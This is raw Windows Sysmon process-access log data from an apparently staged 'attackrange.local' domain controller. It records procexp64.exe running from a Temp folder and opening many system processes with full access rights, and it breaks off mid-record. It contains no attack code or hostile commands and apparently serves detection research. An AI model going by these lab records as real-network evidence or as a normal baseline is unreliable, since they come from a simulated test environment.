15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789243Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789242Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789241Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789240Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789239Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789238Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789237Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789236Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789235Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789234Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789233Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789232Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789231Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789230Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789229Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789228Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789227Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789226Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789225Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789224Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789223Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789222Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789221Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789220Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789219Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789218Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789217Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789216Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789215Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789214Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789213Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789212Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789211Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789210Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789209Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789208Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7